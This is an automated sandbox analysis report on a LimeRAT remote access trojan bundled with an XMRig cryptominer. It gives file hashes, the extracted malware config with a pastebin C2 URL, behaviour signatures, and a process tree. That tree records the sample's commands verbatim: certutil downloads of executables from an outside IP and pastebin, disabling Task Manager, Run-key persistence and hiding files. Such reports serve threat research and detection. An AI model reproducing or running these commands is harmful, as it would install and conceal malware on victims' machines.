Analysis

  • max time kernel
    32s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2022 23:36

General

  • Target

    eb9e4955edda276425933aea122f9a84.exe

  • Size

    47KB

  • MD5

    eb9e4955edda276425933aea122f9a84

  • SHA1

    6763106ffdc12cf213f579f72c1c6e8f3272fa9c

  • SHA256

    75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

  • SHA512

    621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

  • SSDEEP

    768:e7DiMIvhyqeFRKUKPl2+Vf7lWDVkUmg1/oRxf0IbvDOPbPlEnNFqoBc:KiMdzgdoEfskV8Of9bvDI7GDlBc

Malware Config

Extracted

Family

limerat

Attributes
  • aes_key

    beodz

  • antivm

    false

  • c2_url

    https://pastebin.com/raw/PEKpeQWU

  • delay

    3

  • download_payload

    false

  • install

    true

  • install_name

    winlogon.exe

  • main_folder

    AppData

  • pin_spread

    false

  • sub_folder

    \AppData\Windows Protector\

  • usb_spread

    false

Signatures

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Adds policy Run key to start application 2 TTPs 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Sets file to hidden 1 TTPs 14 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 9 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 6 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe
    "C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F49.tmp\6F4A.bat C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3364
      • C:\Windows\system32\certutil.exe
        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        3⤵
          PID:3112
        • C:\Windows\system32\find.exe
          find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
          3⤵
            PID:2180
          • C:\Windows\system32\cmd.exe
            cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
            3⤵
              PID:1016
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='taskmgr.exe' delete
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3972
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='Taskmgr.exe' delete
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1440
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='xmrig.exe' delete
              3⤵
                PID:5064
              • C:\Windows\system32\reg.exe
                REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                3⤵
                • Modifies registry key
                PID:640
              • C:\Windows\system32\certutil.exe
                certutil -urlcache -split -f https://pastebin.com/raw/03Gje1tb "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
                3⤵
                  PID:5036
                • C:\Windows\system32\find.exe
                  find /c "set active" "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
                  3⤵
                    PID:1452
                  • C:\Windows\system32\certutil.exe
                    certutil -urlcache -split -f "http://52.77.214.77:8083/IE.exe" C:\Users\Admin\AppData\Local\Temp\IE.exe
                    3⤵
                      PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\IE.exe
                      "C:\Users\Admin\AppData\Local\Temp\IE.exe"
                      3⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3440
                      • C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
                        "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                        4⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:5000
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9232.tmp\9233.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3684
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic process where name='taskmgr.exe' delete
                            6⤵
                              PID:4008
                            • C:\Windows\system32\taskkill.exe
                              taskkill /IM taskmgr.exe /F
                              6⤵
                              • Kills process with taskkill
                              PID:2248
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic process where name='Taskmgr.exe' delete
                              6⤵
                                PID:816
                              • C:\Windows\system32\taskkill.exe
                                taskkill /IM Taskmgr.exe /F
                                6⤵
                                • Kills process with taskkill
                                PID:1112
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic process where name='xmrig.exe' delete
                                6⤵
                                  PID:3324
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /IM xmrig.exe /F
                                  6⤵
                                  • Kills process with taskkill
                                  PID:5092
                                • C:\Windows\system32\reg.exe
                                  REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  6⤵
                                  • Modifies registry key
                                  PID:3472
                                • C:\Windows\system32\attrib.exe
                                  attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                  6⤵
                                  • Views/modifies file attributes
                                  PID:2320
                                • C:\Windows\system32\attrib.exe
                                  attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                  6⤵
                                  • Views/modifies file attributes
                                  PID:2088
                                • C:\Windows\system32\xcopy.exe
                                  xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                  6⤵
                                    PID:4028
                                  • C:\Windows\system32\xcopy.exe
                                    xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                    6⤵
                                      PID:1940
                                    • C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
                                      "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Modifies registry class
                                      PID:392
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
                                        7⤵
                                        • Blocklisted process makes network request
                                        • Drops startup file
                                        • Adds Run key to start application
                                        PID:3648
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
                                        7⤵
                                        • Blocklisted process makes network request
                                        • Drops startup file
                                        • Adds Run key to start application
                                        PID:4244
                                    • C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
                                      "C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:4380
                                      • C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
                                        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3620
                                        • C:\Users\Admin\AppData\Local\Temp\tmp224.tmp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\tmp224.tmp.exe"
                                          8⤵
                                            PID:2008
                                            • C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
                                              "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                                              9⤵
                                                PID:3476
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B0C.tmp\B0D.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                                                  10⤵
                                                    PID:2804
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic process where name='taskmgr.exe' delete
                                                      11⤵
                                                        PID:3084
                                                      • C:\Windows\system32\taskkill.exe
                                                        taskkill /IM taskmgr.exe /F
                                                        11⤵
                                                        • Kills process with taskkill
                                                        PID:1576
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic process where name='Taskmgr.exe' delete
                                                        11⤵
                                                          PID:4068
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /IM Taskmgr.exe /F
                                                          11⤵
                                                          • Kills process with taskkill
                                                          PID:4124
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic process where name='xmrig.exe' delete
                                                          11⤵
                                                            PID:4028
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /IM xmrig.exe /F
                                                            11⤵
                                                            • Kills process with taskkill
                                                            PID:2560
                                                          • C:\Windows\system32\reg.exe
                                                            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                            11⤵
                                                            • Modifies registry key
                                                            PID:804
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                                            11⤵
                                                            • Views/modifies file attributes
                                                            PID:3724
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                                            11⤵
                                                            • Views/modifies file attributes
                                                            PID:2928
                                                          • C:\Windows\system32\xcopy.exe
                                                            xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                                            11⤵
                                                              PID:2476
                                                            • C:\Windows\system32\xcopy.exe
                                                              xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                                              11⤵
                                                                PID:2084
                                                              • C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
                                                                "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
                                                                11⤵
                                                                  PID:1076
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
                                                                    12⤵
                                                                      PID:3256
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
                                                                      12⤵
                                                                        PID:4520
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                                                      11⤵
                                                                      • Sets file to hidden
                                                                      • Views/modifies file attributes
                                                                      PID:1000
                                                                    • C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
                                                                      "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
                                                                      11⤵
                                                                        PID:1012
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:1944
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:8
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:3716
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:2260
                                                                      • C:\Windows\system32\certutil.exe
                                                                        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
                                                                        11⤵
                                                                          PID:4496
                                                                        • C:\Windows\system32\find.exe
                                                                          find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
                                                                          11⤵
                                                                            PID:3044
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
                                                                            11⤵
                                                                              PID:3492
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic process where name='Microsoft.exe' delete
                                                                              11⤵
                                                                                PID:3696
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic process where name='winupdate.exe' delete
                                                                                11⤵
                                                                                  PID:2356
                                                                                • C:\Windows\system32\reg.exe
                                                                                  REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
                                                                                  11⤵
                                                                                    PID:2360
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
                                                                                    11⤵
                                                                                      PID:2516
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
                                                                                      11⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:1328
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
                                                                                      11⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:4148
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                                                      11⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:4956
                                                                                    • C:\Windows\system32\xcopy.exe
                                                                                      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
                                                                                      11⤵
                                                                                        PID:4480
                                                                                      • C:\Windows\system32\xcopy.exe
                                                                                        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
                                                                                        11⤵
                                                                                          PID:1544
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
                                                                                          11⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:3516
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
                                                                                          11⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:4268
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
                                                                                          11⤵
                                                                                            PID:4308
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
                                                                                              12⤵
                                                                                                PID:1716
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
                                                                                              11⤵
                                                                                                PID:3060
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
                                                                                                11⤵
                                                                                                  PID:2148
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib -s -h "C:\Windows (x86)\*.*"
                                                                                                  11⤵
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:3672
                                                                                                • C:\Windows (x86)\explorer.exe
                                                                                                  "C:\Windows (x86)\explorer.exe"
                                                                                                  11⤵
                                                                                                    PID:220
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                                                                          6⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:1692
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                                                                          6⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:1388
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
                                                                                          6⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:2812
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
                                                                                          6⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:3400
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
                                                                                          6⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:4264
                                                                                        • C:\Windows\system32\certutil.exe
                                                                                          certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
                                                                                          6⤵
                                                                                            PID:2388
                                                                                          • C:\Windows\system32\find.exe
                                                                                            find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
                                                                                            6⤵
                                                                                              PID:2644
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
                                                                                              6⤵
                                                                                                PID:3964
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic process where name='Microsoft.exe' delete
                                                                                                6⤵
                                                                                                  PID:2828
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic process where name='winupdate.exe' delete
                                                                                                  6⤵
                                                                                                    PID:3444
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
                                                                                                    6⤵
                                                                                                    • Adds Run key to start application
                                                                                                    PID:2064
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
                                                                                                    6⤵
                                                                                                    • Adds Run key to start application
                                                                                                    PID:8
                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                    attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
                                                                                                    6⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:4168
                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                    attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
                                                                                                    6⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:4496
                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                    attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                                                                    6⤵
                                                                                                    • Drops startup file
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:3044
                                                                                                  • C:\Windows\system32\xcopy.exe
                                                                                                    xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
                                                                                                    6⤵
                                                                                                      PID:1100
                                                                                                    • C:\Windows\system32\xcopy.exe
                                                                                                      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
                                                                                                      6⤵
                                                                                                      • Drops startup file
                                                                                                      PID:996
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
                                                                                                      6⤵
                                                                                                      • Sets file to hidden
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:4256
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
                                                                                                      6⤵
                                                                                                      • Sets file to hidden
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:884
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
                                                                                                      6⤵
                                                                                                        PID:4692
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
                                                                                                        6⤵
                                                                                                          PID:5028
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib -s -h "C:\Windows (x86)\*.*"
                                                                                                          6⤵
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:3016
                                                                                                        • C:\Windows\system32\certutil.exe
                                                                                                          certutil -urlcache -split -f "http://52.77.214.77:8083/xm/win.com" "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
                                                                                                          6⤵
                                                                                                            PID:2848
                                                                                                          • C:\Windows\system32\certutil.exe
                                                                                                            certutil -urlcache -split -f "http://52.77.214.77:8083/xm/64a1.com" "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
                                                                                                            6⤵
                                                                                                              PID:3392
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              • Modifies registry class
                                                                                                              PID:32
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\aarun.vbs"
                                                                                                                7⤵
                                                                                                                • Checks computer location settings
                                                                                                                PID:3828
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Windows (x86)\xagal.bat" "
                                                                                                                  8⤵
                                                                                                                    PID:4436
                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                      wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
                                                                                                                      9⤵
                                                                                                                        PID:4124
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        attrib -s -h "C:\Windows (x86)\*.*"
                                                                                                                        9⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2236
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
                                                                                                                        9⤵
                                                                                                                          PID:3652
                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                            wmic csproduct get UUID /format:list
                                                                                                                            10⤵
                                                                                                                              PID:1000
                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                              find "="
                                                                                                                              10⤵
                                                                                                                                PID:3400
                                                                                                                            • C:\Windows (x86)\explorer.exe
                                                                                                                              "C:\Windows (x86)\explorer.exe"
                                                                                                                              9⤵
                                                                                                                              • Adds policy Run key to start application
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:1784
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /c del "C:\Windows (x86)\xagal.bat"
                                                                                                                              9⤵
                                                                                                                                PID:3916
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\updateW\win.com
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2908
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping 127.0.0.1 -n 5
                                                                                                                          6⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4372
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
                                                                                                                          6⤵
                                                                                                                            PID:3444
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
                                                                                                                            6⤵
                                                                                                                              PID:5060
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib -s -h "C:\Windows (x86)\*.*"
                                                                                                                              6⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:5020
                                                                                                                            • C:\Windows (x86)\explorer.exe
                                                                                                                              "C:\Windows (x86)\explorer.exe"
                                                                                                                              6⤵
                                                                                                                              • Adds policy Run key to start application
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:1004
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat""
                                                                                                                        3⤵
                                                                                                                          PID:3392

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      d94de84fd13a9a2a0f149fc2345b86fa

                                                                                                                      SHA1

                                                                                                                      a33cbf048dd9093095a005b27127233c43f76a6c

                                                                                                                      SHA256

                                                                                                                      b67d26b491cc6a8e2930701d99516b3f6ed83223194d830573dbfdae3808299d

                                                                                                                      SHA512

                                                                                                                      3fda5b67dc46ff423493a379db1a682b87cb9430005e171ecb68b5893a80ba0026bcb9ade2f71a085a93f94fd43943da171a56302e2feb719756a0eaabcf28b8

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9E610D72817F59FAB1BFA75BAAB7746D

                                                                                                                      Filesize

                                                                                                                      132B

                                                                                                                      MD5

                                                                                                                      cc9ff4010b7de68a7328981e59618920

                                                                                                                      SHA1

                                                                                                                      d709369490a2544d620ba0df857dadd0bb0d791c

                                                                                                                      SHA256

                                                                                                                      b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

                                                                                                                      SHA512

                                                                                                                      e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                      Filesize

                                                                                                                      408B

                                                                                                                      MD5

                                                                                                                      da3cbfd4a25c4b0af96e5414da595623

                                                                                                                      SHA1

